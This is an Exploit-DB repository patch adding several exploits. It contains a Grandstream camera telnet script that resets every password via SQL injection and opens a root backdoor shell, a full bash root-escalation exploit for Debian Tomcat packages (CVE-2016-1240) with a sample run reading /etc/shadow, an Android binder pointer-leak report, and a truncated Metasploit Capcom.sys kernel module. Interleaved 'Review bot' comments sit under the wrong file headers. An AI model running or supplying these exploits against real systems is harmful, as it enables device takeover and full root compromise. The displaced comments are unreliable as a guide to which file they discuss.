From d9bdc2e376699e861ad6b2cecc33bcfc965b2788 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 4 Oct 2016 05:01:17 +0000
Subject: [PATCH] DB: 2016-10-04 7 new exploits maplab ms4w 2.2.1 - Remote File Inclusion MapLab MS4W 2.2.1 - Remote File Inclusion Gimp 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow Gimp 2.2.14 (Win x86) - '.ras' Download/Execute Buffer Overflow Grandsteam GXV3611_HD - SQL Injection Glassfish Server - Unquoted Service Path Privilege Escalation Windows Firewall Control - Unquoted Service Path Privilege Escalation Android - Insufficient Binder Message Verification Pointer Leak DWebPro 8.4.2 - Multiple Vulnerabilities Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)
---
files.csv | 11 +-
platforms/android/dos/40449.txt | 40 +++
platforms/hardware/remote/40441.py | 45 +++
platforms/linux/local/40450.txt | 456 ++++++++++++++++++++++++++++
platforms/win_x86-64/local/40451.rb | 119 ++++++++
platforms/windows/local/40438.txt | 36 +++
platforms/windows/local/40443.txt | 27 ++
platforms/windows/remote/40445.txt | 53 ++++
8 files changed, 785 insertions(+), 2 deletions(-)
create mode 100755 platforms/android/dos/40449.txt
create mode 100755 platforms/hardware/remote/40441.py
create mode 100755 platforms/linux/local/40450.txt
create mode 100755 platforms/win_x86-64/local/40451.rb
create mode 100755 platforms/windows/local/40438.txt
create mode 100755 platforms/windows/local/40443.txt
create mode 100755 platforms/windows/remote/40445.txt
diff --git a/files.csv b/files.csv
index ddfb923d1..c7119fb68 100755
--- a/files.csv
+++ b/files.csv
@@ -3302,7 +3302,7 @@ id,file,description,date,author,platform,type,port
 3634,platforms/windows/remote/3634.txt,"Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow",2007-04-01,jamikazu,windows,remote,0
 3635,platforms/windows/remote/3635.txt,"Microsoft Windows XP - Animated Cursor '.ani' Remote Overflow (2)",2007-04-01,"Trirat Puttaraksa",windows,remote,0
 3636,platforms/windows/remote/3636.txt,"Microsoft Windows - Animated Cursor '.ani' Remote Exploit (eeye patch Bypass)",2007-04-01,jamikazu,windows,remote,0
-3638,platforms/php/webapps/3638.txt,"maplab ms4w 2.2.1 - Remote File Inclusion",2007-04-02,ka0x,php,webapps,0
+3638,platforms/php/webapps/3638.txt,"MapLab MS4W 2.2.1 - Remote File Inclusion",2007-04-02,ka0x,php,webapps,0
 3639,platforms/php/webapps/3639.txt,"PHP-Fusion Module topliste 1.0 - 'cid' SQL Injection",2007-04-02,"Mehmet Ince",php,webapps,0
 3640,platforms/php/webapps/3640.txt,"PHP-Fusion Module Arcade 1.0 - 'cid' SQL Injection",2007-04-02,"Mehmet Ince",php,webapps,0
 3641,platforms/php/webapps/3641.txt,"Really Simple PHP and Ajax (RSPA) 2007-03-23 - Remote File Inclusion",2007-04-02,"Hamid Ebadi",php,webapps,0
@@ -3548,7 +3548,7 @@ id,file,description,date,author,platform,type,port
 3885,platforms/php/webapps/3885.txt,"telltarget 1.3.3 - (tt_docroot) Remote File Inclusion",2007-05-09,GoLd_M,php,webapps,0
 3886,platforms/php/webapps/3886.pl,"SimpleNews 1.0.0 FINAL - (print.php news_id) SQL Injection",2007-05-09,Silentz,php,webapps,0
 3887,platforms/php/webapps/3887.pl,"TutorialCMS 1.00 - (search.php search) SQL Injection",2007-05-09,Silentz,php,webapps,0
-3888,platforms/windows/local/3888.c,"Gimp 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",windows,local,0
+3888,platforms/windows/local/3888.c,"Gimp 2.2.14 (Win x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",windows,local,0
 3890,platforms/windows/dos/3890.html,"McAfee VirusScan 10.0.21 - ActiveX control Stack Overflow (PoC)",2007-05-09,callAX,windows,dos,0
 3891,platforms/windows/dos/3891.html,"Remote Display Dev kit 1.2.1.0 - RControl.dll Denial of Service",2007-05-10,shinnai,windows,dos,0
 3892,platforms/windows/remote/3892.html,"Microsoft Internet Explorer 7 - Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0
@@ -36220,6 +36220,7 @@ id,file,description,date,author,platform,type,port
 39922,platforms/osx/dos/39922.c,"Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in AppleMuxControl.kext",2016-06-10,"Google Security Research",osx,dos,0
 39923,platforms/osx/dos/39923.c,"Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in AppleGraphicsDeviceControl",2016-06-10,"Google Security Research",osx,dos,0
 39924,platforms/osx/dos/39924.c,"Apple Mac OSX - Kernel Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off_resource",2016-06-10,"Google Security Research",osx,dos,0
+40441,platforms/hardware/remote/40441.py,"Grandsteam GXV3611_HD - SQL Injection",2016-09-29,pizza1337,hardware,remote,0
 39925,platforms/osx/dos/39925.c,"Apple Mac OSX - Kernel Exploitable NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value",2016-06-10,"Google Security Research",osx,dos,0
 39926,platforms/osx/dos/39926.c,"Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in IOAudioEngine",2016-06-10,"Google Security Research",osx,dos,0
 39927,platforms/osx/dos/39927.c,"Apple Mac OSX - Kernel OOB Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type",2016-06-10,"Google Security Research",osx,dos,0
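Review bot: The new row's description misspells the vendor as `Grandsteam`; the exploit's own header in 40441.py spells it `Grandstream`, so the index and the file disagree and a vendor search over the index misses the entry. The row should read `40441,platforms/hardware/remote/40441.py,"Grandstream GXV3611_HD - SQL Injection",2016-09-29,pizza1337,hardware,remote,0`. It is also inserted between 39924 and 39925 rather than appended with the other 404xx ids in the hunk at 36561, where 40449 is likewise listed before 40445; if the file is meant to stay in id order both placements need fixing.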
@@ -36561,5 +36562,11 @@ id,file,description,date,author,platform,type,port
 40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
 40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0
 40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
+40438,platforms/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,windows,local,0
 40439,platforms/windows/dos/40439.py,"VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0
 40442,platforms/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Elevation of Privilege",2016-09-30,Tulpa,windows,local,0
+40443,platforms/windows/local/40443.txt,"Windows Firewall Control - Unquoted Service Path Privilege Escalation",2016-10-03,zaeek,windows,local,0
+40449,platforms/android/dos/40449.txt,"Android - Insufficient Binder Message Verification Pointer Leak",2016-10-03,"Google Security Research",android,dos,0
+40445,platforms/windows/remote/40445.txt,"DWebPro 8.4.2 - Multiple Vulnerabilities",2016-10-03,Tulpa,windows,remote,0
+40450,platforms/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation",2016-10-03,"Dawid Golunski",linux,local,0
+40451,platforms/win_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",win_x86-64,local,0
diff --git a/platforms/android/dos/40449.txt b/platforms/android/dos/40449.txt
new file mode 100755
index 000000000..d0712a715
--- /dev/null
+++ b/platforms/android/dos/40449.txt
@@ -0,0 +1,40 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=860
+
+When frameworks/native/libs/binder/Parcel.cpp reads e.g. a string from a parcel, it does not verify that the string doesn't overlap with any byte range that was tagged as a binder object by the sender. When an attacker sends a parcel to a victim process that contains an unexpected binder handle referring to an object from the victim process where string data is expected, the kernel replaces the attacker-specified handle with a pointer to the object in the victim process. The victim then treats that pointer as part of the attacker-supplied input data, possibly making it available to the attacker at a later point in time.
+
+One example of such an echo service is the "clipboard" service: Strings written using setPrimaryClip() can be read back using getPrimaryClip().
+
+A PoC that leaks the addresses of the "permission", "package" and "clipboard" services from system_server is attached (source code and apk).
+
+Its logcat output looks like this:
+
+===============
+[...]
+01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 2a85
+01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 7362
+01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 17f
+01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 0
+01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: fd80
+01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 367b
+01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 71
+01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 0
+01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 4c0
+01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 2964
+01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 71
+01-15 05:20:54.530 19158-19158/com.google.jannh.pointerleak E/leaker: == service "permission" ==
+ type: BINDER_TYPE_BINDER
+ object: 0x000000712967e260
+
+ == service "package" ==
+ type: BINDER_TYPE_BINDER
+ object: 0x000000712963cfc0
+
+ == service "clipboard" ==
+ type: BINDER_TYPE_BINDER
+ object: 0x00000071367bfd80
+===============
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40449.zip
+
diff --git a/platforms/hardware/remote/40441.py b/platforms/hardware/remote/40441.py
new file mode 100755
index 000000000..b80f04a07
--- /dev/null
+++ b/platforms/hardware/remote/40441.py
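Review bot: The file carries none of the header fields the other new text entries in this commit have (title, date, author, affected version, tested-on), so a reader must follow the Project Zero link to learn which Android releases are affected and whether a fix shipped. A short header block above the `Source:` line — the tracker id, the affected component `frameworks/native/libs/binder/Parcel.cpp` named in the text, and the affected/fixed release range taken from the linked issue — would make the entry self-contained and let an administrator confirm exposure without the external page.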
@@ -0,0 +1,45 @@
+# Exploit Title: Grandstream GXV3611_HD Telnet SQL Injection and backdoor command
+# Exploit Author: pizza1337
+# Vendor Homepage: http://www.grandstream.com/
+# Version: GXV3611_HD Core 1.0.3.6, 1.0.4.3
+# GXV3611IR_HD Core 1.0.3.5
+# Tested on:
+# -GXV3611_HD
+# Bootloader Version: 1.0.0.0
+# Core Version: 1.0.4.3
+# Base Version: 1.0.4.43
+# Firmware Version: 1.0.4.43
+# -GXV3611IR_HD
+# Bootloader Version: 1.0.3.5
+# Core Version: 1.0.3.5
+# Base Version: 1.0.3.5
+# Firmware Version: 1.0.3.5
+# CVE : CVE-2015-2866
+# Category: remote
+# More information:
+# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2866
+# https://www.kb.cert.org/vuls/id/253708
+# Description:
+# http://boredhackerblog.blogspot.com/2016/05/hacking-ip-camera-grandstream-gxv3611hd.html
+import telnetlib
+import sys
+
+if len(sys.argv) < 2:
+ print "USAGE: python %s IP_ADDRESS"%sys.argv[0]
+ quit()
+
+conn = telnetlib.Telnet(sys.argv[1])
+conn.read_until("Username: ")
+conn.write("';update user set password='a';--\r\n") #This changes all the passwords to a, including the admin password
+conn.read_until("Password: ")
+conn.write("nothing\r\n")
+conn.read_until("Username: ")
+conn.write("admin\r\n")
+conn.read_until("Password: ")
+conn.write("a\r\n") #Login with the new password
+conn.read_until("> ")
+conn.write("!#/ port lol\r\n") #Backdoor command triggers telnet server to startup. For some reason, typing "!#/ port" does not seem to work.
+conn.read_until("> ")
+conn.write("quit\r\n")
+conn.close()
+print "Telnet into port 20000 with username root and no password to get shell" #There is no login password
\ No newline at end of file
diff --git a/platforms/linux/local/40450.txt b/platforms/linux/local/40450.txt
new file mode 100755
index 000000000..7024448e1
--- /dev/null
+++ b/platforms/linux/local/40450.txt
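Review bot: The header documents only CVE-2015-2866 (the SQL injection at the telnet `Username:` prompt), yet the script depends on a second, separately significant weakness — the `!#/ port lol` command that starts an unauthenticated root telnet service on port 20000, described only in the closing `print` — and it is destructive: the `update user set password='a'` statement resets every account's password on the device, which the header never warns about. Add a `# Note:` block under `# Description:`, e.g. `# Side effect: resets ALL device account passwords to 'a'; the port-20000 shell accepts root with no credentials`, so anyone reproducing the finding knows what state the device is left in and what to look for afterwards (an unexpected listener on TCP/20000). The code is Python 2 only (`print "..."` statements, no interpreter line), which the header should also state since the file ships as a bare `.py`.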
@@ -0,0 +1,456 @@ +============================================= +- Discovered by: Dawid Golunski +- http://legalhackers.com +- dawid (at) legalhackers.com + +- CVE-2016-1240 +- Release date: 30.09.2016 +- Revision: 1 +- Severity: High +============================================= + + +I. VULNERABILITY +------------------------- + +Apache Tomcat packaging on Debian-based distros - Local Root Privilege Escalation + +Affected debian packages: + +Tomcat 8 <= 8.0.36-2 +Tomcat 7 <= 7.0.70-2 +Tomcat 6 <= 6.0.45+dfsg-1~deb8u1 + +Ubuntu systems are also affected. See section VII. for details. +Other systems using the affected debian packages may also be affected. + + +II. BACKGROUND +------------------------- + +"The Apache Tomcat® software is an open source implementation of the +Java Servlet, JavaServer Pages, Java Expression Language and Java WebSocket +technologies. The Java Servlet, JavaServer Pages, Java Expression Language +and Java WebSocket specifications are developed under the Java Community +Process. + +The Apache Tomcat software is developed in an open and participatory +environment and released under the Apache License version 2. +The Apache Tomcat project is intended to be a collaboration of the +best-of-breed developers from around the world. + +Apache Tomcat software powers numerous large-scale, mission-critical web +applications across a diverse range of industries and organizations. +Some of these users and their stories are listed on the PoweredBy wiki page. +" + +http://tomcat.apache.org/ + + +III. INTRODUCTION +------------------------- + +Tomcat (6, 7, 8) packages provided by default repositories on Debian-based +distributions (including Debian, Ubuntu etc.) provide a vulnerable +tomcat init script that allows local attackers who have already gained access +to the tomcat account (for example, by exploiting an RCE vulnerability +in a java web application hosted on Tomcat, uploading a webshell etc.) 
to +escalate their privileges from tomcat user to root and fully compromise the +target system. + +IV. DESCRIPTION +------------------------- + +The vulnerability is located in the tomcat init script provided by affected +packages, normally installed at /etc/init.d/tomcatN. + +The script for tomcat7 contains the following lines: + +-----[tomcat7]---- + +# Run the catalina.sh script as a daemon +set +e +touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out +chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out + +-------[eof]------ + +Local attackers who have gained access to the server in the context of the +tomcat user (for example, through a vulnerability in a web application) would +be able to replace the log file with a symlink to an arbitrary system file +and escalate their privileges to root once Tomcat init script (running as root) +re-opens the catalina.out file after a service restart, reboot etc. + +As attackers would already have a tomcat account at the time of exploitation, +they could also kill the tomcat processes to introduce the need for a restart. + + +V. PROOF OF CONCEPT EXPLOIT +------------------------- + +------[ tomcat-rootprivesc-deb.sh ]------ + +#!/bin/bash +# +# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit +# +# CVE-2016-1240 +# +# Discovered and coded by: +# +# Dawid Golunski +# http://legalhackers.com +# +# This exploit targets Tomcat (versions 6, 7 and 8) packaging on +# Debian-based distros including Debian, Ubuntu etc. +# It allows attackers with a tomcat shell (e.g. obtained remotely through a +# vulnerable java webapp, or locally via weak permissions on webapps in the +# Tomcat webroot directories etc.) to escalate their privileges to root. 
+# +# Usage: +# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred] +# +# The exploit can used in two ways: +# +# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly +# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. +# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up +# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.) +# +# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to +# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. +# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a +# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can +# then add arbitrary commands to the file which will be executed with root privileges by +# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default +# Ubuntu/Debian Tomcat installations). +# +# See full advisory for details at: +# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html +# +# Disclaimer: +# For testing purposes only. Do no harm. +# + +BACKDOORSH="/bin/bash" +BACKDOORPATH="/tmp/tomcatrootsh" +PRIVESCLIB="/tmp/privesclib.so" +PRIVESCSRC="/tmp/privesclib.c" +SUIDBIN="/usr/bin/sudo" + +function cleanexit { + # Cleanup + echo -e "\n[+] Cleaning up..." + rm -f $PRIVESCSRC + rm -f $PRIVESCLIB + rm -f $TOMCATLOG + touch $TOMCATLOG + if [ -f /etc/ld.so.preload ]; then + echo -n > /etc/ld.so.preload 2>/dev/null + fi + echo -e "\n[+] Job done. Exiting with code $1 \n" + exit $1 +} + +function ctrl_c() { + echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation." 
+ cleanexit 0 +} + +#intro +echo -e "\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2016-1240\n" +echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m" + +# Args +if [ $# -lt 1 ]; then + echo -e "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n" + exit 3 +fi +if [ "$2" = "-deferred" ]; then + mode="deferred" +else + mode="active" +fi + +# Priv check +echo -e "\n[+] Starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`" +id | grep -q tomcat +if [ $? -ne 0 ]; then + echo -e "\n[!] You need to execute the exploit as tomcat user! Exiting.\n" + exit 3 +fi + +# Set target paths +TOMCATLOG="$1" +if [ ! -f $TOMCATLOG ]; then + echo -e "\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\n" + exit 3 +fi +echo -e "\n[+] Target Tomcat log file set to $TOMCATLOG" + +# [ Deferred exploitation ] + +# Symlink the log file to /etc/default/locale file which gets executed daily on default +# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am. +# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been +# restarted and file owner gets changed. +if [ "$mode" = "deferred" ]; then + rm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG + if [ $? -ne 0 ]; then + echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink." + cleanexit 3 + fi + echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`" + echo -e "\n[+] The current owner of the file is: \n`ls -l /etc/default/locale`" + echo -ne "\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot" + echo -ne "\n you'll be able to add arbitrary commands to the file which will get executed with root privileges" + echo -ne "\n at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. 
See also -active mode if you can't wait ;)\n\n" + exit 0 +fi + +# [ Active exploitation ] + +trap ctrl_c INT +# Compile privesc preload library +echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" +cat <<_solibeof_>$PRIVESCSRC +#define _GNU_SOURCE +#include +#include +#include +#include +uid_t geteuid(void) { + static uid_t (*old_geteuid)(); + old_geteuid = dlsym(RTLD_NEXT, "geteuid"); + if ( old_geteuid() == 0 ) { + chown("$BACKDOORPATH", 0, 0); + chmod("$BACKDOORPATH", 04777); + unlink("/etc/ld.so.preload"); + } + return old_geteuid(); +} +_solibeof_ +gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl +if [ $? -ne 0 ]; then + echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC." + cleanexit 2; +fi + +# Prepare backdoor shell +cp $BACKDOORSH $BACKDOORPATH +echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`" + +# Safety check +if [ -f /etc/ld.so.preload ]; then + echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety." + cleanexit 2 +fi + +# Symlink the log file to ld.so.preload +rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG +if [ $? -ne 0 ]; then + echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink." + cleanexit 3 +fi +echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`" + +# Wait for Tomcat to re-open the logs +echo -ne "\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart..." +echo -e "\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)" +while :; do + sleep 0.1 + if [ -f /etc/ld.so.preload ]; then + echo $PRIVESCLIB > /etc/ld.so.preload + break; + fi +done + +# /etc/ld.so.preload file should be owned by tomcat user at this point +# Inject the privesc.so shared library to escalate privileges +echo $PRIVESCLIB > /etc/ld.so.preload +echo -e "\n[+] Tomcat restarted. 
The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`" +echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload" +echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`" + +# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) +echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!" +sudo --help 2>/dev/null >/dev/null + +# Check for the rootshell +ls -l $BACKDOORPATH | grep rws | grep -q root +if [ $? -eq 0 ]; then + echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`" + echo -e "\n\033[94mPlease tell me you're seeing this too ;) \033[0m" +else + echo -e "\n[!] Failed to get root" + cleanexit 2 +fi + +# Execute the rootshell +echo -e "\n[+] Executing the rootshell $BACKDOORPATH now! \n" +$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB" +$BACKDOORPATH -p + +# Job done. +cleanexit 0 + +--------------[ EOF ]-------------------- + + + +Example exploit run: +~~~~~~~~~~~~~~ + +tomcat7@ubuntu:/tmp$ id +uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7) + +tomcat7@ubuntu:/tmp$ lsb_release -a +No LSB modules are available. 
+Distributor ID: Ubuntu +Description: Ubuntu 16.04 LTS +Release: 16.04 +Codename: xenial + +tomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat +ii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries +ii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine +ii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files + +tomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out + +Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit +CVE-2016-1240 + +Discovered and coded by: + +Dawid Golunski +http://legalhackers.com + +[+] Starting the exploit in [active] mode with the following privileges: +uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7) + +[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out + +[+] Compiling the privesc shared library (/tmp/privesclib.c) + +[+] Backdoor/low-priv shell installed at: +-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh + +[+] Symlink created at: +lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload + +[+] Waiting for Tomcat to re-open the logs/Tomcat service restart... +You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;) + +[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: +-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload + +[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload + +[+] The /etc/ld.so.preload file now contains: +/tmp/privesclib.so + +[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root! + +[+] Rootshell got assigned root SUID perms at: +-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh + +Please tell me you're seeing this too ;) + +[+] Executing the rootshell /tmp/tomcatrootsh now! 
+ +tomcatrootsh-4.3# id +uid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7) +tomcatrootsh-4.3# whoami +root +tomcatrootsh-4.3# head -n3 /etc/shadow +root:$6$oaf[cut]:16912:0:99999:7::: +daemon:*:16912:0:99999:7::: +bin:*:16912:0:99999:7::: +tomcatrootsh-4.3# exit +exit + +[+] Cleaning up... + +[+] Job done. Exiting with code 0 + + + +VI. BUSINESS IMPACT +------------------------- + +Local attackers who have gained access to tomcat user account (for example +remotely via a vulnerable web application, or locally via weak webroot perms), +could escalate their privileges to root and fully compromise the affected system. + + +VII. SYSTEMS AFFECTED +------------------------- + +The following Debian package versions are affected: + +Tomcat 8 <= 8.0.36-2 +Tomcat 7 <= 7.0.70-2 +Tomcat 6 <= 6.0.45+dfsg-1~deb8u1 + +A more detailed lists of affected packages can be found at: + +Debian: +https://security-tracker.debian.org/tracker/CVE-2016-1240 + +Ubuntu: +http://www.ubuntu.com/usn/usn-3081-1/ + +Other systmes that use Tomcat packages provided by Debian may also be affected. + + +VIII. SOLUTION +------------------------- + +Debian Security Team was contacted and has fixed affected upstream packages. +Update to the latest tomcat packages provided by your distribution. + +IX. 
REFERENCES +------------------------- + +http://legalhackers.com + +http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html + +The exploit's sourcecode +http://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh + +CVE-2016-1240 +http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1240 + +Ubuntu Security Notice USN-3081-1: +http://www.ubuntu.com/usn/usn-3081-1/ + +Debian Security Advisory DSA-3669-1 (tomcat7): +https://lists.debian.org/debian-security-announce/2016/msg00249.html +https://www.debian.org/security/2016/dsa-3669 + +Debian Security Advisory DSA-3670-1 (tomcat8): +https://www.debian.org/security/2016/dsa-3670 + +https://security-tracker.debian.org/tracker/CVE-2016-1240 + + +X. CREDITS +------------------------- + +The vulnerability has been discovered by Dawid Golunski +dawid (at) legalhackers (dot) com +http://legalhackers.com + +XI. REVISION HISTORY +------------------------- + +30.09.2016 - Advisory released + +XII. LEGAL NOTICES +------------------------- + +The information contained within this advisory is supplied "as-is" with +no warranties or guarantees of fitness of use or otherwise. I accept no +responsibility for any damage caused by the use or misuse of this information. \ No newline at end of file diff --git a/platforms/win_x86-64/local/40451.rb b/platforms/win_x86-64/local/40451.rb new file mode 100755 index 000000000..c24153561 --- /dev/null +++ b/platforms/win_x86-64/local/40451.rb 
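Review bot: Section VIII tells readers to update but names no fixed package versions, while Section VII lists only the affected upper bounds (`Tomcat 8 <= 8.0.36-2`, `Tomcat 7 <= 7.0.70-2`, `Tomcat 6 <= 6.0.45+dfsg-1~deb8u1`); adding the fixed versions from the DSA-3669/DSA-3670 and USN-3081-1 references already cited in Section IX would let an administrator verify remediation with `dpkg -l` instead of inferring it. Section IV quotes the offending `touch`/`chown` lines from the tomcat7 init script but never says what the corrected script does differently, so a one-line note on the fixed behaviour, taken from the same advisories, would make the mitigation concrete. `Other systmes` in Section VII is a typo for `Other systems`.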
@@ -0,0 +1,119 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/post/windows/reflective_dll_injection'
+require 'rex'
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = NormalRanking
+
+ include Msf::Post::File
+ include Msf::Post::Windows::Priv
+ include Msf::Post::Windows::Process
+ include Msf::Post::Windows::ReflectiveDLLInjection
+
+ def initialize(info={})
+ super(update_info(info, {
+ 'Name' => 'Windows Capcom.sys Kernel Execution Exploit (x64 only)',
+ 'Description' => %q{
+ This module abuses the Capcom.sys kernel driver's function that allows for an
+ arbitrary function to be executed in the kernel from user land. This function
+ purposely disables SMEP prior to invoking a function given by the caller.
+ This has been tested on Windows 7 x64.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'TheWack0lian', # Issue discovery
+ 'OJ Reeves' # exploit and msf module
+ ],
+ 'Arch' => [ ARCH_X86_64],
+ 'Platform' => 'win',
+ 'SessionTypes' => [ 'meterpreter' ],
+ 'DefaultOptions' => {
+ 'EXITFUNC' => 'thread',
+ },
+ 'Targets' => [
+ [ 'Windows x64 (<= 8)', { 'Arch' => ARCH_X86_64 } ]
+ ],
+ 'Payload' => {
+ 'Space' => 4096,
+ 'DisableNops' => true
+ },
+ 'References' => [
+ ['URL', 'https://twitter.com/TheWack0lian/status/779397840762245124']
+ ],
+ 'DisclosureDate' => 'Jan 01 1999', # non-vuln exploit date
+ 'DefaultTarget' => 0
+ }))
+ end
+
+ def check
+ if sysinfo['OS'] !~ /windows 7/i
+ return Exploit::CheckCode::Unknown
+ end
+
+ if sysinfo['Architecture'] =~ /(wow|x)64/i
+ arch = ARCH_X86_64
+ else
+ return Exploit::CheckCode::Safe
+ end
+
+ file_path = expand_path('%windir%') << '\\system32\\capcom.sys'
+ return Exploit::CheckCode::Safe unless file_exist?(file_path)
+
+ # TODO: check for the capcom.sys driver and its version.
+ return Exploit::CheckCode::Appears
+ end
+
+ def exploit
+ if is_system?
+ fail_with(Failure::None, 'Session is already elevated')
+ end
+
+ check_result = check
